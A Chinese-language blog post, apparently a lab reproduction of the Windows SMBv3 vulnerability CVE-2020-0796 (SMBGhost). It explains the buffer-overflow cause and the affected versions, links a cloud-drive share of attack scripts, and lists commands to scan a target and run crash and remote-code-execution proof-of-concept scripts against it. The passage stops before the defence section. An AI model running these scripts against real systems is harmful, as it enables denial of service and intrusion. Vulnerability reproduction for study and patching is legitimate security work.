当前位置：首页 > news >正文

CVE-2020-0796永恒之蓝2.0（漏洞复现）

news 来源：原创 2025/5/14 16:49:08

前言

产生原因

影响范围

漏洞复现

复现环境

复现步骤

防御措施

总结

前言

在网络安全的战场上，漏洞一直是攻防双方关注的焦点。CVE-2020-0796，这个被称为 “永恒之蓝 2.0” 的漏洞，一度引起了广泛的关注与担忧。它究竟是怎样的一个漏洞，又会对我们的系统产生怎样的威胁？本文将深入探讨这个漏洞，并进行漏洞复现，同时为大家提供有效的防御措施。

产生原因

这个漏洞的产生主要源于 Windows 对 SMBv3 协议处理中的缺陷。当 SMBv3 协议处理某些特制的压缩数据包时，存在缓冲区溢出的问题。Windows 系统在解析这些数据包时，没有对数据包的长度和内容进行严格的边界检查，从而导致攻击者可以精心构造恶意数据包，使得系统在处理这些数据包时发生缓冲区溢出，进而执行攻击者预先植入的恶意代码。

影响范围

该漏洞影响众多基于 Windows 的操作系统，包括但不限于：

Windows Server 2019

Windows 10 Version 1903、1909 等较新版本

微软官方也发布了相关安全公告，建议用户尽快进行更新以修复此漏洞。

漏洞复现

通过网盘分享的文件：永恒之蓝攻击脚本
链接: https://pan.baidu.com/s/1ZtQEMg2nBtn6VZtfg6_k1g?pwd=5c6r 提取码: 5c6r
--来自百度网盘超级会员v3的分享

复现环境

攻击机：Kali Linux

目标机：Windows 10（未安装相关安全补丁）

复现步骤

使用的命令

nmap -p 445 --script=smb-protocols <目标IP>    #使用Nmap对目标网络进行扫描
unzip CVE-2020-0796.zip                        #解压攻击压缩包
cd CVE-2020-0796                               #进入到解压的文件夹
cd SMBGhost                                    #切换到漏洞检测目录
python3 scanner.py 10.0.0.103                  #使用python3脚本进行检测目标ip地址是否有此漏洞
cd ../CVE-2020-0796-PoC                        #切换到攻击脚本目录
python3 CVE-2020-0796.py 10.0.0.103            #使用python3进行攻击

1.上传永恒之蓝攻击脚本,并进行解压

2.解压后切换到解压后的路径中，并查看文件夹下的内容

drwxrwxrwx 4 root root 4096 2024年 6月29日  CVE-2020-0796-PoC  #蓝屏攻击脚本
drwxrwxrwx 2 root root 4096 2024年 6月29日  SMBGhost           #扫描脚本
drwxrwxrwx 2 root root 4096 2024年 6月29日  SMBGhost_RCE_PoC   #远程控制攻击脚本

3.切换进入扫描脚本文件夹，使用python3运行扫描脚本，扫描目标主机是否存在此漏洞